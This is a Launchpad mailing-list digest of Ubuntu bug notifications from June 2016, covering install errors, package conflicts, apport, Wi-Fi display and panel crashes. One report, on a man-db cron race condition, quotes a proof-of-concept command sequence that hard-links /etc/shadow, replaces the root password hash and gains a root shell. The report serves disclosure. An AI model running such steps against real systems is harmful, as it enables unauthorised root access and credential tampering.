   default via 192.168.43.1 dev wlp2s0  proto static  metric 600 
   169.254.0.0/16 dev wlp2s0  scope link  metric 1000 
   192.168.43.0/24 dev wlp2s0  proto kernel  scope link  src 192.168.43.89  
metric 600
  NetworkManager.state:
   [main]
   NetworkingEnabled=true
   WirelessEnabled=true
   WWANEnabled=true
  SourcePackage: network-manager
  UpgradeStatus: No upgrade log present (probably fresh install)
  nmcli-dev:
   DEVICE  TYPE  STATEDBUS-PATH  
CONNECTION CON-UUID  CON-PATH   

   wlp2s0  wifi  connected/org/freedesktop/NetworkManager/Devices/0  
HTC Portable Hotspot DF99  c29b59ba-b6ef-49db-b159-75ec21d3f436  
/org/freedesktop/NetworkManager/ActiveConnection/0 
   enp1s0  ethernet  unavailable  /org/freedesktop/NetworkManager/Devices/1  -- 
----
 
   lo  loopback  unmanaged

[Touch-packages] [Bug 1589123] [NEW] System Settings, software and updates

2016-06-04 Thread Lola
Public bug reported:

I loaded a new disk  Ubuntu 16.04 64bit from OSDisc to my computer. I was in 
System settings setting things up. After setting up software and updates and 
closing I received a message for my password to update those settings. After 
putting it in I received another message that it was unable to download the 
information. Something about "apt-cdrom" which was in the DVD drive, that is 
when the error message came up.
  The logs should tell you exactly what was going on.

 The error message said something about the loading of the disc didn't
go right and some things weren't downloaded and installed or ignored.

 Now I don't know what I'm supposed to do, reload the program to disk or
what?  Can the loading of the Ubuntu 16.04 64bit be trusted ?  What
should I do?

 choo...@gmail.com

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: xorg 1:7.7+13ubuntu3
ProcVersionSignature: Ubuntu 4.4.0-21.37-generic 4.4.6
Uname: Linux 4.4.0-21-generic x86_64
.tmp.unity_support_test.0:
 
ApportVersion: 2.20.1-0ubuntu2
Architecture: amd64
CompizPlugins: No value set for 
`/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: compiz
CompositorUnredirectDriverBlacklist: '(nouveau|Intel).*Mesa 8.0'
CompositorUnredirectFSW: true
Date: Sat Jun  4 12:48:51 2016
DistUpgraded: Fresh install
DistroCodename: xenial
DistroVariant: ubuntu
ExtraDebuggingInterest: Yes, if not too technical
GraphicsCard:
 NVIDIA Corporation GF104 [GeForce GTX 460] [10de:0e22] (rev a1) (prog-if 00 
[VGA controller])
   Subsystem: eVga.com. Corp. GF104 [GeForce GTX 460] [3842:1362]
InstallationDate: Installed on 2016-06-03 (0 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
MachineType: MSI MS-7640
ProcEnviron:
 LANGUAGE=en_US
 PATH=(custom, no user)
 LANG=en_US.UTF-8
 SHELL=/bin/bash
ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-4.4.0-21-generic 
root=/dev/mapper/ubuntu--vg-root ro quiet splash vt.handoff=7
SourcePackage: xorg
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 10/20/2010
dmi.bios.vendor: American Megatrends Inc.
dmi.bios.version: V1.7
dmi.board.asset.tag: To Be Filled By O.E.M.
dmi.board.name: 890FXA-GD70 (MS-7640)
dmi.board.vendor: MSI
dmi.board.version: 1.0
dmi.chassis.asset.tag: To Be Filled By O.E.M.
dmi.chassis.type: 3
dmi.chassis.vendor: MSI
dmi.chassis.version: 1.0
dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvrV1.7:bd10/20/2010:svnMSI:pnMS-7640:pvr1.0:rvnMSI:rn890FXA-GD70(MS-7640):rvr1.0:cvnMSI:ct3:cvr1.0:
dmi.product.name: MS-7640
dmi.product.version: 1.0
dmi.sys.vendor: MSI
version.compiz: compiz 1:0.9.12.2+16.04.20160415-0ubuntu1
version.ia32-libs: ia32-libs N/A
version.libdrm2: libdrm2 2.4.67-1
version.libgl1-mesa-dri: libgl1-mesa-dri 11.2.0-1ubuntu2
version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
version.libgl1-mesa-glx: libgl1-mesa-glx 11.2.0-1ubuntu2
version.xserver-xorg-core: xserver-xorg-core 2:1.18.3-1ubuntu2
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.1-1ubuntu2
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:7.7.0-1
version.xserver-xorg-video-intel: xserver-xorg-video-intel 
2:2.99.917+git20160325-1ubuntu1
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.12-1build2
xserver.bootTime: Sat Jun  4 11:48:55 2016
xserver.configfile: default
xserver.errors:
 Failed to load module "nvidia" (module does not exist, 0)
 Failed to load module "nvidia" (module does not exist, 0)
xserver.logfile: /var/log/Xorg.0.log
xserver.version: 2:1.18.3-1ubuntu2
xserver.video_driver: nouveau

** Affects: xorg (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug compiz-0.9 ubuntu xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to xorg in Ubuntu.
https://bugs.launchpad.net/bugs/1589123

Title:
  System Settings, software and updates

Status in xorg package in Ubuntu:
  New

Bug description:
  I loaded a new disk  Ubuntu 16.04 64bit from OSDisc to my computer. I was in 
System settings setting things up. After setting up software and updates and 
closing I received a message for my password to update those settings. After 
putting it in I received another message that it was unable to download the 
information. Something about "apt-cdrom" which was in the DVD drive, that is 
when the error message came up.
The logs should tell you exactly what was going on.

   The error message said something about the loading of the disc didn't
  go right and some things weren't downloaded and installed or ignored.

   Now I don't know what I'm supposed to do, reload the program to disk
  or what?  Can the loading of the Ubuntu 16.04 64bit be trusted ?  What
  should I do?

   choo...@gmail.com

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: xorg 1:7.7+13ubuntu3
  ProcVersionSignature: Ubuntu 4.4.0-21.37-generic 4.4.6
  Uname: Linux 4.4.0-21-generic x86_64
  .tm

[Touch-packages] [Bug 1129856] Re: package libqtcore4 4:4.8.3+dfsg-0ubuntu3.1 failed to install/upgrade: trying to overwrite shared '/etc/xdg/Trolltech.conf', which is different from other instances o

2016-06-04 Thread Paul Barden
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following NEW packages will be installed:
  libqtcore4
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
22 not fully installed or removed.
Need to get 0 B/1,552 kB of archives.
After this operation, 5,092 kB of additional disk space will be used.
(Reading database ... 218529 files and directories currently installed.)
Preparing to unpack .../libqtcore4_4%3a4.8.7+dfsg-5ubuntu2_amd64.deb ...
Unpacking libqtcore4:amd64 (4:4.8.7+dfsg-5ubuntu2) ...
dpkg: error processing archive 
/var/cache/apt/archives/libqtcore4_4%3a4.8.7+dfsg-5ubuntu2_amd64.deb (--unpack):
 trying to overwrite shared '/etc/xdg/Trolltech.conf', which is different from 
other instances of package libqtcore4:amd64
dpkg-deb: error: subprocess paste was killed by signal (Broken pipe)
Processing triggers for libc-bin (2.23-0ubuntu3) ...
Errors were encountered while processing:
 /var/cache/apt/archives/libqtcore4_4%3a4.8.7+dfsg-5ubuntu2_amd64.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)

So I guess I still can't so anything...

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to qt4-x11 in Ubuntu.
https://bugs.launchpad.net/bugs/1129856

Title:
  package libqtcore4 4:4.8.3+dfsg-0ubuntu3.1 failed to install/upgrade:
  trying to overwrite shared '/etc/xdg/Trolltech.conf', which is
  different from other instances of package libqtcore4:amd64

Status in qt4-x11 package in Ubuntu:
  Confirmed

Bug description:
  Description:  Ubuntu 12.10
  Release:  12.10

  
  libqtcore4:
Installiert: 4:4.8.3+dfsg-0ubuntu3.1
Kandidat:4:4.8.3+dfsg-0ubuntu3.1
Versionstabelle:
   *** 4:4.8.3+dfsg-0ubuntu3.1 0
  500 http://de.archive.ubuntu.com/ubuntu/ quantal-updates/main amd64 
Packages
  500 http://security.ubuntu.com/ubuntu/ quantal-security/main amd64 
Packages
  100 /var/lib/dpkg/status
   4:4.8.3+dfsg-0ubuntu3 0
  500 http://de.archive.ubuntu.com/ubuntu/ quantal/main amd64 Packages
   4:4.8.1-0ubuntu4.4 0
  500 http://de.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 
Packages
  500 http://security.ubuntu.com/ubuntu/ precise-security/main amd64 
Packages

  Happened during start of machine

  ProblemType: Package
  DistroRelease: Ubuntu 12.10
  Package: libqtcore4 4:4.8.3+dfsg-0ubuntu3.1
  ProcVersionSignature: Ubuntu 3.5.0-23.35-generic 3.5.7.2
  Uname: Linux 3.5.0-23-generic x86_64
  ApportVersion: 2.6.1-0ubuntu10
  Architecture: amd64
  Date: Sun Feb 17 10:02:12 2013
  DuplicateSignature:
   Unpacking replacement libqtcore4:amd64 ...
   dpkg: error processing 
/var/cache/apt/archives/libqtcore4_4%3a4.8.3+dfsg-0ubuntu3.1_amd64.deb 
(--unpack):
trying to overwrite shared '/etc/xdg/Trolltech.conf', which is different 
from other instances of package libqtcore4:amd64
  ErrorMessage: trying to overwrite shared '/etc/xdg/Trolltech.conf', which is 
different from other instances of package libqtcore4:amd64
  MarkForUpload: True
  SourcePackage: qt4-x11
  Title: package libqtcore4 4:4.8.3+dfsg-0ubuntu3.1 failed to install/upgrade: 
trying to overwrite shared '/etc/xdg/Trolltech.conf', which is different from 
other instances of package libqtcore4:amd64
  UpgradeStatus: Upgraded to quantal on 2012-10-22 (119 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/qt4-x11/+bug/1129856/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 764414] Re: private master bugs are confusing and lead to more duplicate filings

2016-06-04 Thread dino99
changed to "in progress" as im not able to set it back to "triaged"

** Changed in: apport (Ubuntu)
   Status: Fix Committed => In Progress

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/764414

Title:
  private master bugs are confusing and lead to more duplicate filings

Status in apport package in Ubuntu:
  In Progress

Bug description:
  Binary package hint: apport

  Apport currently tracks the master bug as a private bug visible only
  to Ubuntu developers (bugcontrol) and makes duplicate bugs public
  after stripping their data.

  This works well but has some downsides:
   - Launchpad cannot show the master bug to folk reporting bugs via apport (so 
they file new bugs always)
   - After users file a new bug apport detects its a duplicate and then they 
cannot see the master bug and get frustrated.

  It would be nice to have:
   - the master bug be public so that reporters of dups can see it in the dupe 
finder and can see if a dupe is detected post-filing.
   - Developers still have easy access to the raw crash data.
    - One way to do that that does not need much development would be to have a 
private bug exist, linked from the master bug (e.g. with a comment or in the 
description; something like 'Confidential crashdump for this bug is attached to 
bug 12345 - only visible to Ubuntu developers').

  One way to achieve this is to have apport file a new public bug to be
  the master. This would have the necessary metadata and would include
  the link to the private bug + gather all the duplicates to itself. One
  downside is that Apport would appear to be the bug reporter for all
  crashdump based bug reports. That's not necessarily a bad thing, but
  it may confuse people.

  Another way would be to have apport file a new private bug, move the
  attachments over from the original bug, add explanation and metadata
  in the description, subscribe bugcontrol and then sanitise the
  original bug report the same way it sanitises public bugs today. This
  would make the original bug be the public master, preserving the date
  of filing and the reporter. OTOH large files would need to be shuffled
  around and this might be unreliable.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/764414/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589115] [NEW] Meizu Pro 5: Wifi Display with Lenovo Wireless Display Adapter fails at the end

2016-06-04 Thread Michael
Public bug reported:

I'm trying to pair a Meizu Pro 5 with a Lenovo WDA using the new OTA-11
Wireless Display feature which unfortunately doesn't seem to work. These
are the progress messages on the WDA side displayed so far:

0. Searching for your device
1. Press WPS button to connect
2. Connection in Progress
3. Negotiating with peer
4. Connection Established
5. Waiting for Network Address
6. Waiting for Source Video
and finally
7. Connection Failed

Point 6. was the furthest accomplishment. Sometimes there was already an error 
after at 3. and 5.  
The Meizu error message is "There was an unknown error connecting to 
Lenovo_2B61".

I tested the Lenovo WDA with a Windows 10 "SurfTab" tablet and were able
to connect to it more or less reliably.

Is there a list of WiDi adapters which were tested or used for
development and will work with aethercast for the Meizu Pro 5? Or any
specific configuration to use?

Thanks,
M.

** Affects: aethercast
 Importance: Undecided
 Status: New

** Also affects: aethercast
   Importance: Undecided
   Status: New

** No longer affects: camera-app (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to camera-app in Ubuntu.
https://bugs.launchpad.net/bugs/1589115

Title:
  Meizu Pro 5: Wifi Display with Lenovo Wireless Display Adapter fails
  at the end

Status in aethercast:
  New

Bug description:
  I'm trying to pair a Meizu Pro 5 with a Lenovo WDA using the new
  OTA-11 Wireless Display feature which unfortunately doesn't seem to
  work. These are the progress messages on the WDA side displayed so
  far:

  0. Searching for your device
  1. Press WPS button to connect
  2. Connection in Progress
  3. Negotiating with peer
  4. Connection Established
  5. Waiting for Network Address
  6. Waiting for Source Video
  and finally
  7. Connection Failed

  Point 6. was the furthest accomplishment. Sometimes there was already an 
error after at 3. and 5.  
  The Meizu error message is "There was an unknown error connecting to 
Lenovo_2B61".

  I tested the Lenovo WDA with a Windows 10 "SurfTab" tablet and were
  able to connect to it more or less reliably.

  Is there a list of WiDi adapters which were tested or used for
  development and will work with aethercast for the Meizu Pro 5? Or any
  specific configuration to use?

  Thanks,
  M.

To manage notifications about this bug go to:
https://bugs.launchpad.net/aethercast/+bug/1589115/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 764414] Re: private master bugs are confusing and lead to more duplicate filings

2016-06-04 Thread jose
** Changed in: apport (Ubuntu)
   Status: Triaged => Fix Committed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/764414

Title:
  private master bugs are confusing and lead to more duplicate filings

Status in apport package in Ubuntu:
  Fix Committed

Bug description:
  Binary package hint: apport

  Apport currently tracks the master bug as a private bug visible only
  to Ubuntu developers (bugcontrol) and makes duplicate bugs public
  after stripping their data.

  This works well but has some downsides:
   - Launchpad cannot show the master bug to folk reporting bugs via apport (so 
they file new bugs always)
   - After users file a new bug apport detects its a duplicate and then they 
cannot see the master bug and get frustrated.

  It would be nice to have:
   - the master bug be public so that reporters of dups can see it in the dupe 
finder and can see if a dupe is detected post-filing.
   - Developers still have easy access to the raw crash data.
    - One way to do that that does not need much development would be to have a 
private bug exist, linked from the master bug (e.g. with a comment or in the 
description; something like 'Confidential crashdump for this bug is attached to 
bug 12345 - only visible to Ubuntu developers').

  One way to achieve this is to have apport file a new public bug to be
  the master. This would have the necessary metadata and would include
  the link to the private bug + gather all the duplicates to itself. One
  downside is that Apport would appear to be the bug reporter for all
  crashdump based bug reports. That's not necessarily a bad thing, but
  it may confuse people.

  Another way would be to have apport file a new private bug, move the
  attachments over from the original bug, add explanation and metadata
  in the description, subscribe bugcontrol and then sanitise the
  original bug report the same way it sanitises public bugs today. This
  would make the original bug be the public master, preserving the date
  of filing and the reporter. OTOH large files would need to be shuffled
  around and this might be unreliable.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/764414/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1482786] Re: man-db daily cron job TOCTOU bug when processing catman pages

2016-06-04 Thread jose
** Changed in: apport (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: man-db (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: pam (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: shadow (Ubuntu)
   Status: Confirmed => Fix Committed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1482786

Title:
  man-db daily cron job TOCTOU bug when processing catman pages

Status in apport package in Ubuntu:
  Fix Committed
Status in man-db package in Ubuntu:
  Fix Committed
Status in pam package in Ubuntu:
  Fix Committed
Status in shadow package in Ubuntu:
  Fix Committed

Bug description:
  The daily mandb cleanup job for old catman pages changes the
  permissions of all non-man files to user man. The problematic code is:

  # expunge old catman pages which have not been read in a week
  if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
  find /var/cache/man -ignore_readdir_race ! -user man -print0 | \
xargs -r0 chown -f man || true
fi
...

  By creating a hard link and winning the race, user man may escalate
  privileges to user root. See [1] for full explanation.

  man# mkdir -p /var/cache/man/etc
  man# ln /var/crash/.lock /var/cache/man/etc/shadow
  man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath 
/var/cache/man/etc --LinkTarget /etc
  ... Wait till daily cronjob was run
  man# cp /etc/shadow .
  man# sed -r -e 
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:9:7:::/' 
/etc/shadow > x
  man# cat x > /etc/shadow; rm x
  man# su -s /bin/sh (password is 123)
  root# cat shadow > /etc/shadow; chown root /etc/shadow

  
  # lsb_release -rd
  Description:Ubuntu 14.04.3 LTS
  Release:14.04

  # apt-cache policy man-db
  man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
   *** 2.6.7.1-1ubuntu1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 
Packages
  100 /var/lib/dpkg/status
   2.6.7.1-1 0
  500 http://archive.ubuntu.com/ubuntu/ trusty/main amd64 Packages

  [1]
  http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1482786/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1586755] Re: package apport 2.20.1-0ubuntu2.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

2016-06-04 Thread jose
** Description changed:

  I just did a package updatea manually (typed "updater" into launcher).
  
  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: apport 2.20.1-0ubuntu2.1
  ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  ApportLog:
-  
+ 
  ApportVersion: 2.20.1-0ubuntu2.1
  Architecture: amd64
  CrashReports:
-  644:0:116:0:2016-05-28 11:40:34.796151866 +0300:2016-05-28 
11:40:34.796151866 +0300:/var/crash/udev.0.upload
-  600:0:116:491414:2016-05-29 13:45:02.161813020 +0300:2016-05-29 
13:45:03.161813020 +0300:/var/crash/apport.0.crash
-  600:109:116:0:2016-05-28 11:40:40.052191695 +0300:2016-05-28 
11:40:40.052191695 +0300:/var/crash/udev.0.uploaded
-  640:0:116:810280:2016-05-28 11:40:30.160125494 +0300:2016-05-28 
11:40:31.160125494 +0300:/var/crash/udev.0.crash
+  644:0:116:0:2016-05-28 11:40:34.796151866 +0300:2016-05-28 
11:40:34.796151866 +0300:/var/crash/udev.0.upload
+  600:0:116:491414:2016-05-29 13:45:02.161813020 +0300:2016-05-29 
13:45:03.161813020 +0300:/var/crash/apport.0.crash
+  600:109:116:0:2016-05-28 11:40:40.052191695 +0300:2016-05-28 
11:40:40.052191695 +0300:/var/crash/udev.0.uploaded
+  640:0:116:810280:2016-05-28 11:40:30.160125494 +0300:2016-05-28 
11:40:31.160125494 +0300:/var/crash/udev.0.crash
  Date: Sun May 29 13:45:03 2016
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2016-05-12 (16 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  PackageArchitecture: all
  RelatedPackageVersions:
-  dpkg 1.18.4ubuntu1.1
-  apt  1.2.10ubuntu1
+  dpkg 1.18.4ubuntu1.1
+  apt  1.2.10ubuntu1
  SourcePackage: apport
  Title: package apport 2.20.1-0ubuntu2.1 failed to install/upgrade: subprocess 
installed post-installation script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

** Changed in: apport (Ubuntu)
   Status: Confirmed => Fix Committed

** Changed in: apport (Ubuntu)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1586755

Title:
  package apport 2.20.1-0ubuntu2.1 failed to install/upgrade: subprocess
  installed post-installation script returned error exit status 1

Status in apport package in Ubuntu:
  Fix Released

Bug description:
  I just did a package updatea manually (typed "updater" into launcher).

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: apport 2.20.1-0ubuntu2.1
  ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  ApportLog:

  ApportVersion: 2.20.1-0ubuntu2.1
  Architecture: amd64
  CrashReports:
   644:0:116:0:2016-05-28 11:40:34.796151866 +0300:2016-05-28 
11:40:34.796151866 +0300:/var/crash/udev.0.upload
   600:0:116:491414:2016-05-29 13:45:02.161813020 +0300:2016-05-29 
13:45:03.161813020 +0300:/var/crash/apport.0.crash
   600:109:116:0:2016-05-28 11:40:40.052191695 +0300:2016-05-28 
11:40:40.052191695 +0300:/var/crash/udev.0.uploaded
   640:0:116:810280:2016-05-28 11:40:30.160125494 +0300:2016-05-28 
11:40:31.160125494 +0300:/var/crash/udev.0.crash
  Date: Sun May 29 13:45:03 2016
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2016-05-12 (16 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  PackageArchitecture: all
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.1
   apt  1.2.10ubuntu1
  SourcePackage: apport
  Title: package apport 2.20.1-0ubuntu2.1 failed to install/upgrade: subprocess 
installed post-installation script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1586755/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1586755] Re: package apport 2.20.1-0ubuntu2.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1

2016-06-04 Thread Launchpad Bug Tracker
Status changed to 'Confirmed' because the bug affects multiple users.

** Changed in: apport (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/1586755

Title:
  package apport 2.20.1-0ubuntu2.1 failed to install/upgrade: subprocess
  installed post-installation script returned error exit status 1

Status in apport package in Ubuntu:
  Fix Released

Bug description:
  I just did a package updatea manually (typed "updater" into launcher).

  ProblemType: Package
  DistroRelease: Ubuntu 16.04
  Package: apport 2.20.1-0ubuntu2.1
  ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  ApportLog:

  ApportVersion: 2.20.1-0ubuntu2.1
  Architecture: amd64
  CrashReports:
   644:0:116:0:2016-05-28 11:40:34.796151866 +0300:2016-05-28 
11:40:34.796151866 +0300:/var/crash/udev.0.upload
   600:0:116:491414:2016-05-29 13:45:02.161813020 +0300:2016-05-29 
13:45:03.161813020 +0300:/var/crash/apport.0.crash
   600:109:116:0:2016-05-28 11:40:40.052191695 +0300:2016-05-28 
11:40:40.052191695 +0300:/var/crash/udev.0.uploaded
   640:0:116:810280:2016-05-28 11:40:30.160125494 +0300:2016-05-28 
11:40:31.160125494 +0300:/var/crash/udev.0.crash
  Date: Sun May 29 13:45:03 2016
  ErrorMessage: subprocess installed post-installation script returned error 
exit status 1
  InstallationDate: Installed on 2016-05-12 (16 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  PackageArchitecture: all
  RelatedPackageVersions:
   dpkg 1.18.4ubuntu1.1
   apt  1.2.10ubuntu1
  SourcePackage: apport
  Title: package apport 2.20.1-0ubuntu2.1 failed to install/upgrade: subprocess 
installed post-installation script returned error exit status 1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1586755/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1432428] Re: unity-panel-service crashes when clicking onboard indicator

2016-06-04 Thread Launchpad Bug Tracker
Status changed to 'Confirmed' because the bug affects multiple users.

** Changed in: onboard (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to at-spi2-atk in Ubuntu.
https://bugs.launchpad.net/bugs/1432428

Title:
  unity-panel-service crashes when clicking onboard indicator

Status in at-spi2-atk package in Ubuntu:
  Confirmed
Status in onboard package in Ubuntu:
  Confirmed

Bug description:
  When clicking the onboard indicator for the first time (after starting
  onboard), it can cause  a crash of unity-panel-service. I never got
  crashes of unity-panel-service in connection with other indicators or
  applications, so I suppose it is something specific to the way how
  onboard creates its indicator.

  Apport is regularly collecting the information for this crash, but
  then it quietly disappears, without telling me whether the crash was
  automatically reported and to where. Unfortunately I don't have any
  references / bug report numbers etc. but I have a file
  _usr_lib_unity_unity-panel-service.1000.crash (13MB) that apport
  apparently created (I don't which format it is). I was hoping there is
  a chance someone here could find out more than when I report it to
  unity, because it happens very specifically when using onboard.  How
  can I get more debug info, or is the crash file of any help?

  Ubuntu 14.10 64bit
  onboard 1.1.0+1949-0ppa1~utopic
  unity 7.3.1+14.10.20141016-0ubuntu1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/at-spi2-atk/+bug/1432428/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1552928] Re: New bottom edge component is harder to flick up

2016-06-04 Thread Michael Zanetti
** Also affects: canonical-devices-system-image
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-ui-toolkit in
Ubuntu.
https://bugs.launchpad.net/bugs/1552928

Title:
  New bottom edge component is harder to flick up

Status in Canonical System Image:
  New
Status in ubuntu-ui-toolkit package in Ubuntu:
  Confirmed

Bug description:
  I usually hold the phone in one hand and open the bottom edge by
  flicking up from the bottom with the thumb. This worked fine with the
  previous bottom edge, however, with the new one, there seems to be
  larger amount of dragging required. I keep on failing to open the
  bottom edge in the messages-app and clock app, now that they use the
  new component.

  When dragging very slowly such an big required distance does make
  sense, but for quick flicks with the thumb, it should also take the
  speed and/or touch points history into account and reduce the required
  distance if it detects a fast flick gesture.

  In the right edge implementation for instance, it tracks the touch
  points and already activates the gesture after a rather short distance
  (2 grid units), provided it is a one-way gesture with increasing
  distance from the edge in each recognized point. Such a logic would
  imo also make sense for the bottom edge.

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1552928/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1432428] Re: unity-panel-service crashes when clicking onboard indicator

2016-06-04 Thread Launchpad Bug Tracker
Status changed to 'Confirmed' because the bug affects multiple users.

** Changed in: at-spi2-atk (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to at-spi2-atk in Ubuntu.
https://bugs.launchpad.net/bugs/1432428

Title:
  unity-panel-service crashes when clicking onboard indicator

Status in at-spi2-atk package in Ubuntu:
  Confirmed
Status in onboard package in Ubuntu:
  Confirmed

Bug description:
  When clicking the onboard indicator for the first time (after starting
  onboard), it can cause  a crash of unity-panel-service. I never got
  crashes of unity-panel-service in connection with other indicators or
  applications, so I suppose it is something specific to the way how
  onboard creates its indicator.

  Apport is regularly collecting the information for this crash, but
  then it quietly disappears, without telling me whether the crash was
  automatically reported and to where. Unfortunately I don't have any
  references / bug report numbers etc. but I have a file
  _usr_lib_unity_unity-panel-service.1000.crash (13MB) that apport
  apparently created (I don't which format it is). I was hoping there is
  a chance someone here could find out more than when I report it to
  unity, because it happens very specifically when using onboard.  How
  can I get more debug info, or is the crash file of any help?

  Ubuntu 14.10 64bit
  onboard 1.1.0+1949-0ppa1~utopic
  unity 7.3.1+14.10.20141016-0ubuntu1

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/at-spi2-atk/+bug/1432428/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


